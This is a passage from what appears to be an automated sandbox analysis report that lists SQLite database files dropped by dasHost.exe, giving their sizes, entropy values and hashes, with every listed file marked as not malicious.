                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
